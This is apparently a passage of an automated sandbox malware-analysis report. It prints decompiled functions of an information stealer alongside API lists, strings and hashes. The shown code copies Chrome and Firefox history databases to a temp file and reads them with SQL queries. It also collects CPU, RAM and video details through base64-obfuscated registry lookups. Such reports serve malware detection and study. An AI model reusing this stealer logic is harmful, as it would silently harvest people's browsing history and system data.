                                                                                                                                                                                          0x004129b4
                                                                                                                                                                                          0x004129b5
                                                                                                                                                                                          0x004129b6
                                                                                                                                                                                          0x004129b9
                                                                                                                                                                                          0x004129bc
                                                                                                                                                                                          0x004129bf
                                                                                                                                                                                          0x004129c6
                                                                                                                                                                                          0x004129c7
                                                                                                                                                                                          0x004129cc
                                                                                                                                                                                          0x004129cf
                                                                                                                                                                                          0x004129d2
                                                                                                                                                                                          0x004129d5
                                                                                                                                                                                          0x004129dc
                                                                                                                                                                                          0x004129dd
                                                                                                                                                                                          0x004129e2
                                                                                                                                                                                          0x004129e5
                                                                                                                                                                                          0x004129e8
                                                                                                                                                                                          0x004129ed
                                                                                                                                                                                          0x004129f0
                                                                                                                                                                                          0x004129f5
                                                                                                                                                                                          0x004129f8
                                                                                                                                                                                          0x004129fb
                                                                                                                                                                                          0x00412a00
                                                                                                                                                                                          0x00412a03
                                                                                                                                                                                          0x00412a10
                                                                                                                                                                                          0x00412a15
                                                                                                                                                                                          0x00412a1b
                                                                                                                                                                                          0x00412a20
                                                                                                                                                                                          0x00412a28
                                                                                                                                                                                          0x00412a2d
                                                                                                                                                                                          0x00412a30
                                                                                                                                                                                          0x00412a35
                                                                                                                                                                                          0x00412a40
                                                                                                                                                                                          0x00412a48
                                                                                                                                                                                          0x00412a4b
                                                                                                                                                                                          0x00412a55
                                                                                                                                                                                          0x00412a64
                                                                                                                                                                                          0x00412a69
                                                                                                                                                                                          0x00412a6f
                                                                                                                                                                                          0x00412a77
                                                                                                                                                                                          0x00412a7a
                                                                                                                                                                                          0x00412a7f
                                                                                                                                                                                          0x00412a85
                                                                                                                                                                                          0x00412a94
                                                                                                                                                                                          0x00412ab0
                                                                                                                                                                                          0x00412ab7
                                                                                                                                                                                          0x00412ab9
                                                                                                                                                                                          0x00412abc
                                                                                                                                                                                          0x00412abe
                                                                                                                                                                                          0x00412ad7
                                                                                                                                                                                          0x00412ade
                                                                                                                                                                                          0x00412ae0
                                                                                                                                                                                          0x00412ae3
                                                                                                                                                                                          0x00412ae5
                                                                                                                                                                                          0x00412baa
                                                                                                                                                                                          0x00412bae
                                                                                                                                                                                          0x00412bb5
                                                                                                                                                                                          0x00412bb8
                                                                                                                                                                                          0x00412bbb
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00412af3
                                                                                                                                                                                          0x00412afb
                                                                                                                                                                                          0x00412b03
                                                                                                                                                                                          0x00412b0e
                                                                                                                                                                                          0x00412b1f
                                                                                                                                                                                          0x00412b2a
                                                                                                                                                                                          0x00412b3b
                                                                                                                                                                                          0x00412b46
                                                                                                                                                                                          0x00412b4d
                                                                                                                                                                                          0x00412b4f
                                                                                                                                                                                          0x00412b57
                                                                                                                                                                                          0x00412b5c
                                                                                                                                                                                          0x00412b5f
                                                                                                                                                                                          0x00412b6a
                                                                                                                                                                                          0x00412b6f
                                                                                                                                                                                          0x00412b72
                                                                                                                                                                                          0x00412b7d
                                                                                                                                                                                          0x00412b82
                                                                                                                                                                                          0x00412b85
                                                                                                                                                                                          0x00412b90
                                                                                                                                                                                          0x00412b95
                                                                                                                                                                                          0x00412b98
                                                                                                                                                                                          0x00412ba5
                                                                                                                                                                                          0x00412ba5
                                                                                                                                                                                          0x00412baa
                                                                                                                                                                                          0x00412ae5
                                                                                                                                                                                          0x00412bc1
                                                                                                                                                                                          0x00412bc5
                                                                                                                                                                                          0x00412bcc
                                                                                                                                                                                          0x00412bd3
                                                                                                                                                                                          0x00412bda
                                                                                                                                                                                          0x00412bdf
                                                                                                                                                                                          0x00412be2
                                                                                                                                                                                          0x00412bf7
                                                                                                                                                                                          0x00412c05
                                                                                                                                                                                          0x00412a96
                                                                                                                                                                                          0x00412a98
                                                                                                                                                                                          0x00412a9b
                                                                                                                                                                                          0x00412a9b
                                                                                                                                                                                          0x00412c0c
                                                                                                                                                                                          0x00412c0f
                                                                                                                                                                                          0x00412c12
                                                                                                                                                                                          0x00412c17
                                                                                                                                                                                          0x00412c1f
                                                                                                                                                                                          0x00412c24
                                                                                                                                                                                          0x00412c27
                                                                                                                                                                                          0x00412c2c
                                                                                                                                                                                          0x00412c34
                                                                                                                                                                                          0x00412c39
                                                                                                                                                                                          0x00412c41
                                                                                                                                                                                          0x00412c46
                                                                                                                                                                                          0x00412c4e
                                                                                                                                                                                          0x00412c53
                                                                                                                                                                                          0x00412c56
                                                                                                                                                                                          0x00412c5b
                                                                                                                                                                                          0x00412c63
                                                                                                                                                                                          0x00412c68
                                                                                                                                                                                          0x00412c70

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 004129E8
                                                                                                                                                                                          • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00412CA8,?,.tmp,?,?,00000000,00412BE7,?,00000000,00412C71,?,00000000), ref: 00412A64
                                                                                                                                                                                          • DeleteFileW.KERNEL32(00000000), ref: 00412C05
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • .tmp, xrefs: 00412A03
                                                                                                                                                                                          • %TEMP%, xrefs: 00412A23
                                                                                                                                                                                          • , xrefs: 00412B98
                                                                                                                                                                                          • SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch") , urls.title , urls.url FROM urls, visits WHERE urls.id = visits.url ORDER By visits.visit_time DESC LIMIT 0, 10000, xrefs: 00412ACE
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$CopyCountDeleteTick
                                                                                                                                                                                          • String ID: $%TEMP%$.tmp$SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch") , urls.title , urls.url FROM urls, visits WHERE urls.id = visits.url ORDER By visits.visit_time DESC LIMIT 0, 10000
                                                                                                                                                                                          • API String ID: 2381671008-351388873
                                                                                                                                                                                          • Opcode ID: ef1d475732b00c6658fc3908e371784fc5ab7c3495e9950f6ff69cc71723a14a
                                                                                                                                                                                          • Instruction ID: 01415e14dcc46a11cfd4ad831b9185370b0be0c5393ee3a374a7f2b0250afb3b
                                                                                                                                                                                          • Opcode Fuzzy Hash: ef1d475732b00c6658fc3908e371784fc5ab7c3495e9950f6ff69cc71723a14a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 05810C31A00109AFDB00EF95DD82ADEBBB9EF48315F204436F514F7292DB78AE558B58
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0041256C, Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 222fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 43%
                                                                                                                                                                                          			E0041256C(char __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				intOrPtr _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				WCHAR* _t86;
				intOrPtr* _t101;
				void* _t103;
				intOrPtr* _t105;
				intOrPtr* _t109;
				intOrPtr* _t138;
				void* _t140;
				intOrPtr* _t142;
				void* _t144;
				intOrPtr* _t152;
				intOrPtr* _t158;
				intOrPtr* _t164;
				void* _t166;
				void* _t178;
				intOrPtr _t198;
				intOrPtr _t200;
				intOrPtr _t213;
				intOrPtr _t217;
				intOrPtr _t218;
				void* _t219;
				void* _t220;

				_t215 = __esi;
				_t177 = __ebx;
				_t217 = _t218;
				_t178 = 0xb;
				do {
					_push(0);
					_push(0);
					_t178 = _t178 - 1;
					_t223 = _t178;
				} while (_t178 != 0);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v12 = __edx;
				_v8 = __eax;
				E004040F4( &_v8);
				_push(_t217);
				_push(0x412839);
				_push( *[fs:eax]);
				 *[fs:eax] = _t218;
				E00403B80( &_v28);
				_push(_t217);
				_push(0x4127af);
				_push( *[fs:eax]);
				 *[fs:eax] = _t218;
				E00406FDC(GetTickCount(), __ebx,  &_v60, __esi, _t223);
				_push(_v60);
				E00406F1C( &_v64, __ebx, __edi, __esi, _t223);
				_push(_v64);
				_push(L".tmp");
				E00403E1C();
				E0040781C(_v8, _t177,  &_v40, _t223);
				E004062D8(L"%TEMP%",  &_v72, _t223);
				_push(_v72);
				_push(0x412870);
				_push(_v32);
				E00403E1C();
				E0040781C(_v68, _t177,  &_v44, _t223);
				_t86 = E00403D3C(_v44);
				CopyFileW(E00403D3C(_v40), _t86, 0xffffffff);
				E0040377C( &_v76, _v44);
				E00404AFC(_v76, _t177, _t178,  &_v36, _t215, _t223);
				E00403D2C( &_v80, _v36);
				if(E004076B0(_v80, _t177, _t178) != 0) {
					_t101 =  *0x41b55c; // 0x41c784
					_t103 =  *((intOrPtr*)( *_t101))(E00403990(_v36),  &_v16);
					_t219 = _t218 + 8;
					__eflags = _t103;
					if(_t103 == 0) {
						_t138 =  *0x41b5cc; // 0x41c78c
						_t140 =  *((intOrPtr*)( *_t138))(_v16, "SELECT DATETIME(moz_historyvisits.visit_date/1000000, \"unixepoch\", \"localtime\"),moz_places.title,moz_places.url FROM moz_places, moz_historyvisits WHERE moz_places.id = moz_historyvisits.place_id ORDER By moz_historyvisits.visit_date DESC LIMIT 0, 10000", 0xffffffff,  &_v20,  &_v24);
						_t220 = _t219 + 0x14;
						__eflags = _t140;
						if(_t140 == 0) {
							while(1) {
								_t142 =  *0x41b600; // 0x41c790
								_t144 =  *((intOrPtr*)( *_t142))(_v20);
								__eflags = _t144 - 0x64;
								if(_t144 != 0x64) {
									goto L9;
								}
								E004034E4( &_v48);
								E004034E4( &_v52);
								E004034E4( &_v56);
								_t152 =  *0x41b588; // 0x41c794
								E004036DC( &_v48,  *((intOrPtr*)( *_t152))(_v20, 0));
								_t158 =  *0x41b588; // 0x41c794
								E004036DC( &_v52,  *((intOrPtr*)( *_t158))(_v20, 1));
								_t164 =  *0x41b588; // 0x41c794
								_t166 =  *((intOrPtr*)( *_t164))(_v20, 2);
								_t220 = _t220 + 0x18;
								E004036DC( &_v56, _t166);
								_push(_v28);
								_push(0x412978);
								E00403D2C( &_v84, _v48);
								_push(_v84);
								_push(0x412980);
								E00403D2C( &_v88, _v52);
								_push(_v88);
								_push(0x41298c);
								E00403D2C( &_v92, _v56);
								_push(_v92);
								_push(L"\r\n\r\n");
								E00403E1C();
							}
						}
					}
					L9:
					_t105 =  *0x41b654; // 0x41c79c
					 *((intOrPtr*)( *_t105))(_v20);
					_t109 =  *0x41b590; // 0x41c788
					 *((intOrPtr*)( *_t109))(_v16);
					_pop(_t198);
					 *[fs:eax] = _t198;
					E00403BBC(_v12, _v28);
					DeleteFileW(E00403D3C(_v44));
				} else {
					_pop(_t213);
					 *[fs:eax] = _t213;
				}
				_pop(_t200);
				 *[fs:eax] = _t200;
				_push(E00412840);
				E00403B98( &_v92, 4);
				E004034E4( &_v76);
				E00403B98( &_v72, 4);
				E00403508( &_v56, 3);
				E00403B98( &_v44, 2);
				E004034E4( &_v36);
				E00403B98( &_v32, 2);
				return E00403B80( &_v8);
			}














































                                                                                                                                                                                          0x0041256c
                                                                                                                                                                                          0x0041256c
                                                                                                                                                                                          0x0041256d
                                                                                                                                                                                          0x0041256f
                                                                                                                                                                                          0x00412574
                                                                                                                                                                                          0x00412574
                                                                                                                                                                                          0x00412576
                                                                                                                                                                                          0x00412578
                                                                                                                                                                                          0x00412578
                                                                                                                                                                                          0x00412578
                                                                                                                                                                                          0x0041257b
                                                                                                                                                                                          0x0041257c
                                                                                                                                                                                          0x0041257d
                                                                                                                                                                                          0x0041257e
                                                                                                                                                                                          0x00412581
                                                                                                                                                                                          0x00412587
                                                                                                                                                                                          0x0041258e
                                                                                                                                                                                          0x0041258f
                                                                                                                                                                                          0x00412594
                                                                                                                                                                                          0x00412597
                                                                                                                                                                                          0x0041259d
                                                                                                                                                                                          0x004125a4
                                                                                                                                                                                          0x004125a5
                                                                                                                                                                                          0x004125aa
                                                                                                                                                                                          0x004125ad
                                                                                                                                                                                          0x004125b8
                                                                                                                                                                                          0x004125bd
                                                                                                                                                                                          0x004125c3
                                                                                                                                                                                          0x004125c8
                                                                                                                                                                                          0x004125cb
                                                                                                                                                                                          0x004125d8
                                                                                                                                                                                          0x004125e3
                                                                                                                                                                                          0x004125f0
                                                                                                                                                                                          0x004125f5
                                                                                                                                                                                          0x004125f8
                                                                                                                                                                                          0x004125fd
                                                                                                                                                                                          0x00412608
                                                                                                                                                                                          0x00412613
                                                                                                                                                                                          0x0041261d
                                                                                                                                                                                          0x0041262c
                                                                                                                                                                                          0x00412637
                                                                                                                                                                                          0x00412642
                                                                                                                                                                                          0x0041264d
                                                                                                                                                                                          0x0041265c
                                                                                                                                                                                          0x00412678
                                                                                                                                                                                          0x0041267f
                                                                                                                                                                                          0x00412681
                                                                                                                                                                                          0x00412684
                                                                                                                                                                                          0x00412686
                                                                                                                                                                                          0x0041269f
                                                                                                                                                                                          0x004126a6
                                                                                                                                                                                          0x004126a8
                                                                                                                                                                                          0x004126ab
                                                                                                                                                                                          0x004126ad
                                                                                                                                                                                          0x00412772
                                                                                                                                                                                          0x00412776
                                                                                                                                                                                          0x0041277d
                                                                                                                                                                                          0x00412780
                                                                                                                                                                                          0x00412783
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004126bb
                                                                                                                                                                                          0x004126c3
                                                                                                                                                                                          0x004126cb
                                                                                                                                                                                          0x004126d6
                                                                                                                                                                                          0x004126e7
                                                                                                                                                                                          0x004126f2
                                                                                                                                                                                          0x00412703
                                                                                                                                                                                          0x0041270e
                                                                                                                                                                                          0x00412715
                                                                                                                                                                                          0x00412717
                                                                                                                                                                                          0x0041271f
                                                                                                                                                                                          0x00412724
                                                                                                                                                                                          0x00412727
                                                                                                                                                                                          0x00412732
                                                                                                                                                                                          0x00412737
                                                                                                                                                                                          0x0041273a
                                                                                                                                                                                          0x00412745
                                                                                                                                                                                          0x0041274a
                                                                                                                                                                                          0x0041274d
                                                                                                                                                                                          0x00412758
                                                                                                                                                                                          0x0041275d
                                                                                                                                                                                          0x00412760
                                                                                                                                                                                          0x0041276d
                                                                                                                                                                                          0x0041276d
                                                                                                                                                                                          0x00412772
                                                                                                                                                                                          0x004126ad
                                                                                                                                                                                          0x00412789
                                                                                                                                                                                          0x0041278d
                                                                                                                                                                                          0x00412794
                                                                                                                                                                                          0x0041279b
                                                                                                                                                                                          0x004127a2
                                                                                                                                                                                          0x004127a7
                                                                                                                                                                                          0x004127aa
                                                                                                                                                                                          0x004127bf
                                                                                                                                                                                          0x004127cd
                                                                                                                                                                                          0x0041265e
                                                                                                                                                                                          0x00412660
                                                                                                                                                                                          0x00412663
                                                                                                                                                                                          0x00412663
                                                                                                                                                                                          0x004127d4
                                                                                                                                                                                          0x004127d7
                                                                                                                                                                                          0x004127da
                                                                                                                                                                                          0x004127e7
                                                                                                                                                                                          0x004127ef
                                                                                                                                                                                          0x004127fc
                                                                                                                                                                                          0x00412809
                                                                                                                                                                                          0x00412816
                                                                                                                                                                                          0x0041281e
                                                                                                                                                                                          0x0041282b
                                                                                                                                                                                          0x00412838

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 004125B0
                                                                                                                                                                                          • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00412870,?,.tmp,?,?,00000000,004127AF,?,00000000,00412839,?,00000000), ref: 0041262C
                                                                                                                                                                                          • DeleteFileW.KERNEL32(00000000), ref: 004127CD
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • SELECT DATETIME(moz_historyvisits.visit_date/1000000, "unixepoch", "localtime"),moz_places.title,moz_places.url FROM moz_places, moz_historyvisits WHERE moz_places.id = moz_historyvisits.place_id ORDER By moz_historyvisits.visit_date DESC LIMIT 0, 10000, xrefs: 00412696
                                                                                                                                                                                          • .tmp, xrefs: 004125CB
                                                                                                                                                                                          • %TEMP%, xrefs: 004125EB
                                                                                                                                                                                          • , xrefs: 00412760
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$CopyCountDeleteTick
                                                                                                                                                                                          • String ID: $%TEMP%$.tmp$SELECT DATETIME(moz_historyvisits.visit_date/1000000, "unixepoch", "localtime"),moz_places.title,moz_places.url FROM moz_places, moz_historyvisits WHERE moz_places.id = moz_historyvisits.place_id ORDER By moz_historyvisits.visit_date DESC LIMIT 0, 10000
                                                                                                                                                                                          • API String ID: 2381671008-462058183
                                                                                                                                                                                          • Opcode ID: 416e3653b17ffb8b792b409557a66c85679e4b3f6acb14a3ced176a5403dbca9
                                                                                                                                                                                          • Instruction ID: 880bf71673710542150f6ebe4433b3a02274b147136189202950d85bd83b2515
                                                                                                                                                                                          • Opcode Fuzzy Hash: 416e3653b17ffb8b792b409557a66c85679e4b3f6acb14a3ced176a5403dbca9
                                                                                                                                                                                          • Instruction Fuzzy Hash: A9810C71A00109AFDB00EF95DD82ADEBBB9EF48314F504536F410F72A2DB78AE558B58
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00416744, Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 114COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 46%
                                                                                                                                                                                          			E00416744(signed int __eax, void* __ebx, void* __esi) {
				struct _SYSTEM_INFO _v40;
				intOrPtr _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				intOrPtr _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				signed int _t38;
				signed int _t91;
				void* _t92;
				void* _t93;
				intOrPtr _t112;
				void* _t116;
				intOrPtr _t119;
				intOrPtr _t120;

				_t117 = __esi;
				_t38 = __eax | 0x5500000a;
				_t119 = _t120;
				_t92 = 0xb;
				do {
					_push(0);
					_push(0);
					_t92 = _t92 - 1;
					_t122 = _t92;
				} while (_t92 != 0);
				_t91 = _t38;
				_push(_t119);
				_push(0x4168d4);
				_push( *[fs:eax]);
				 *[fs:eax] = _t120;
				GetSystemInfo( &_v40);
				E00403D2C( &_v48,  *_t91);
				_push(_v48);
				_push(L"CPU Model: ");
				_push(0);
				_push( &_v52);
				E00406984("UHJvY2Vzc29yTmFtZVN0cmluZw==", _t91,  &_v60, _t116, __esi);
				E00403D2C( &_v56, _v60);
				_push(_v56);
				E00406984("SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==", _t91,  &_v68, _t116, __esi);
				E00403D2C( &_v64, _v68);
				_pop(_t93);
				E00407500(0x80000002, _t91, _t93, _v64);
				_push(_v52);
				_push(0x416974);
				E00403E1C();
				E0040377C(_t91, _v44);
				E004037DC( &_v80, "CPU Count: ",  *_t91);
				E00403D2C( &_v76, _v80);
				_push(_v76);
				E00406FDC(_v40.dwNumberOfProcessors, _t91,  &_v84, _t117, _t122);
				_push(_v84);
				_push(0x416974);
				E00403E1C();
				E0040377C(_t91, _v72);
				_push( *_t91);
				_push("GetRAM: ");
				E00416584( &_v88, _t91, _t117, _t122);
				_push(_v88);
				_push(0x4169ac);
				E00403850();
				_push( *_t91);
				_push("Video Info\r\n");
				E00416644( &_v92, _t91, _t116, _t117);
				_push(_v92);
				E00403850();
				_t112 = 0x4169ac;
				 *[fs:eax] = _t112;
				_push(E004168DB);
				E00403508( &_v92, 2);
				E00403B80( &_v84);
				E004034E4( &_v80);
				E00403B98( &_v76, 2);
				E004034E4( &_v68);
				E00403B80( &_v64);
				E004034E4( &_v60);
				return E00403B98( &_v56, 4);
			}

























                                                                                                                                                                                          0x00416744
                                                                                                                                                                                          0x00416744
                                                                                                                                                                                          0x00416749
                                                                                                                                                                                          0x0041674b
                                                                                                                                                                                          0x00416750
                                                                                                                                                                                          0x00416750
                                                                                                                                                                                          0x00416752
                                                                                                                                                                                          0x00416754
                                                                                                                                                                                          0x00416754
                                                                                                                                                                                          0x00416754
                                                                                                                                                                                          0x00416758
                                                                                                                                                                                          0x0041675c
                                                                                                                                                                                          0x0041675d
                                                                                                                                                                                          0x00416762
                                                                                                                                                                                          0x00416765
                                                                                                                                                                                          0x0041676c
                                                                                                                                                                                          0x00416776
                                                                                                                                                                                          0x0041677b
                                                                                                                                                                                          0x0041677e
                                                                                                                                                                                          0x00416783
                                                                                                                                                                                          0x00416788
                                                                                                                                                                                          0x00416791
                                                                                                                                                                                          0x0041679c
                                                                                                                                                                                          0x004167a4
                                                                                                                                                                                          0x004167ad
                                                                                                                                                                                          0x004167b8
                                                                                                                                                                                          0x004167c5
                                                                                                                                                                                          0x004167c6
                                                                                                                                                                                          0x004167cb
                                                                                                                                                                                          0x004167ce
                                                                                                                                                                                          0x004167db
                                                                                                                                                                                          0x004167e5
                                                                                                                                                                                          0x004167f4
                                                                                                                                                                                          0x004167ff
                                                                                                                                                                                          0x00416804
                                                                                                                                                                                          0x0041680d
                                                                                                                                                                                          0x00416812
                                                                                                                                                                                          0x00416815
                                                                                                                                                                                          0x00416822
                                                                                                                                                                                          0x0041682c
                                                                                                                                                                                          0x00416831
                                                                                                                                                                                          0x00416833
                                                                                                                                                                                          0x0041683b
                                                                                                                                                                                          0x00416840
                                                                                                                                                                                          0x00416843
                                                                                                                                                                                          0x0041684f
                                                                                                                                                                                          0x00416854
                                                                                                                                                                                          0x00416856
                                                                                                                                                                                          0x0041685e
                                                                                                                                                                                          0x00416863
                                                                                                                                                                                          0x00416872
                                                                                                                                                                                          0x00416879
                                                                                                                                                                                          0x0041687c
                                                                                                                                                                                          0x0041687f
                                                                                                                                                                                          0x0041688c
                                                                                                                                                                                          0x00416894
                                                                                                                                                                                          0x0041689c
                                                                                                                                                                                          0x004168a9
                                                                                                                                                                                          0x004168b1
                                                                                                                                                                                          0x004168b9
                                                                                                                                                                                          0x004168c1
                                                                                                                                                                                          0x004168d3

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetSystemInfo.KERNEL32(0041A13A,00000000,004168D4,?,?,00000000,00000000,?,0041748D,?,,?,Zone: ,?,004175A8,?), ref: 0041676C
                                                                                                                                                                                            • Part of subcall function 00403B80: SysFreeString.OLEAUT32(00000000), ref: 00403B8E
                                                                                                                                                                                            • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FreeString$InfoSystem
                                                                                                                                                                                          • String ID: CPU Count: $CPU Model: $GetRAM: $SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==$UHJvY2Vzc29yTmFtZVN0cmluZw==$Video Info
                                                                                                                                                                                          • API String ID: 4070941872-1038824218
                                                                                                                                                                                          • Opcode ID: ea7c467229dc03554361d8e6d8d9c9cd62cd80fa8131b6840d5b8a065aae733e
                                                                                                                                                                                          • Instruction ID: 93658ecaa3e0ddcdd5b33a88495a7f5ee5c1cb8a97fdfd99440d65a07410f67b
                                                                                                                                                                                          • Opcode Fuzzy Hash: ea7c467229dc03554361d8e6d8d9c9cd62cd80fa8131b6840d5b8a065aae733e
                                                                                                                                                                                          • Instruction Fuzzy Hash: DF411F70A1010DABDB01FFD1D882ACDBBB9EF48309F61403BF504B7296D639EA458A58
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00416748, Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 114COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 46%
                                                                                                                                                                                          			E00416748(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) {
				struct _SYSTEM_INFO _v40;
				intOrPtr _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				intOrPtr _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				intOrPtr* _t90;
				void* _t91;
				void* _t92;
				intOrPtr _t111;
				intOrPtr _t118;
				intOrPtr _t119;

				_t116 = __esi;
				_t115 = __edi;
				_t118 = _t119;
				_t91 = 0xb;
				do {
					_push(0);
					_push(0);
					_t91 = _t91 - 1;
					_t120 = _t91;
				} while (_t91 != 0);
				_t90 = __eax;
				_push(_t118);
				_push(0x4168d4);
				_push( *[fs:eax]);
				 *[fs:eax] = _t119;
				GetSystemInfo( &_v40);
				E00403D2C( &_v48,  *_t90);
				_push(_v48);
				_push(L"CPU Model: ");
				_push(0);
				_push( &_v52);
				E00406984("UHJvY2Vzc29yTmFtZVN0cmluZw==", _t90,  &_v60, __edi, __esi);
				E00403D2C( &_v56, _v60);
				_push(_v56);
				E00406984("SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==", _t90,  &_v68, __edi, __esi);
				E00403D2C( &_v64, _v68);
				_pop(_t92);
				E00407500(0x80000002, _t90, _t92, _v64);
				_push(_v52);
				_push(0x416974);
				E00403E1C();
				E0040377C(_t90, _v44);
				E004037DC( &_v80, "CPU Count: ",  *_t90);
				E00403D2C( &_v76, _v80);
				_push(_v76);
				E00406FDC(_v40.dwNumberOfProcessors, _t90,  &_v84, _t116, _t120);
				_push(_v84);
				_push(0x416974);
				E00403E1C();
				E0040377C(_t90, _v72);
				_push( *_t90);
				_push("GetRAM: ");
				E00416584( &_v88, _t90, _t116, _t120);
				_push(_v88);
				_push(0x4169ac);
				E00403850();
				_push( *_t90);
				_push("Video Info\r\n");
				E00416644( &_v92, _t90, _t115, _t116);
				_push(_v92);
				E00403850();
				_t111 = 0x4169ac;
				 *[fs:eax] = _t111;
				_push(E004168DB);
				E00403508( &_v92, 2);
				E00403B80( &_v84);
				E004034E4( &_v80);
				E00403B98( &_v76, 2);
				E004034E4( &_v68);
				E00403B80( &_v64);
				E004034E4( &_v60);
				return E00403B98( &_v56, 4);
			}























                                                                                                                                                                                          0x00416748
                                                                                                                                                                                          0x00416748
                                                                                                                                                                                          0x00416749
                                                                                                                                                                                          0x0041674b
                                                                                                                                                                                          0x00416750
                                                                                                                                                                                          0x00416750
                                                                                                                                                                                          0x00416752
                                                                                                                                                                                          0x00416754
                                                                                                                                                                                          0x00416754
                                                                                                                                                                                          0x00416754
                                                                                                                                                                                          0x00416758
                                                                                                                                                                                          0x0041675c
                                                                                                                                                                                          0x0041675d
                                                                                                                                                                                          0x00416762
                                                                                                                                                                                          0x00416765
                                                                                                                                                                                          0x0041676c
                                                                                                                                                                                          0x00416776
                                                                                                                                                                                          0x0041677b
                                                                                                                                                                                          0x0041677e
                                                                                                                                                                                          0x00416783
                                                                                                                                                                                          0x00416788
                                                                                                                                                                                          0x00416791
                                                                                                                                                                                          0x0041679c
                                                                                                                                                                                          0x004167a4
                                                                                                                                                                                          0x004167ad
                                                                                                                                                                                          0x004167b8
                                                                                                                                                                                          0x004167c5
                                                                                                                                                                                          0x004167c6
                                                                                                                                                                                          0x004167cb
                                                                                                                                                                                          0x004167ce
                                                                                                                                                                                          0x004167db
                                                                                                                                                                                          0x004167e5
                                                                                                                                                                                          0x004167f4
                                                                                                                                                                                          0x004167ff
                                                                                                                                                                                          0x00416804
                                                                                                                                                                                          0x0041680d
                                                                                                                                                                                          0x00416812
                                                                                                                                                                                          0x00416815
                                                                                                                                                                                          0x00416822
                                                                                                                                                                                          0x0041682c
                                                                                                                                                                                          0x00416831
                                                                                                                                                                                          0x00416833
                                                                                                                                                                                          0x0041683b
                                                                                                                                                                                          0x00416840
                                                                                                                                                                                          0x00416843
                                                                                                                                                                                          0x0041684f
                                                                                                                                                                                          0x00416854
                                                                                                                                                                                          0x00416856
                                                                                                                                                                                          0x0041685e
                                                                                                                                                                                          0x00416863
                                                                                                                                                                                          0x00416872
                                                                                                                                                                                          0x00416879
                                                                                                                                                                                          0x0041687c
                                                                                                                                                                                          0x0041687f
                                                                                                                                                                                          0x0041688c
                                                                                                                                                                                          0x00416894
                                                                                                                                                                                          0x0041689c
                                                                                                                                                                                          0x004168a9
                                                                                                                                                                                          0x004168b1
                                                                                                                                                                                          0x004168b9
                                                                                                                                                                                          0x004168c1
                                                                                                                                                                                          0x004168d3

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetSystemInfo.KERNEL32(0041A13A,00000000,004168D4,?,?,00000000,00000000,?,0041748D,?,,?,Zone: ,?,004175A8,?), ref: 0041676C
                                                                                                                                                                                            • Part of subcall function 00403B80: SysFreeString.OLEAUT32(00000000), ref: 00403B8E
                                                                                                                                                                                            • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
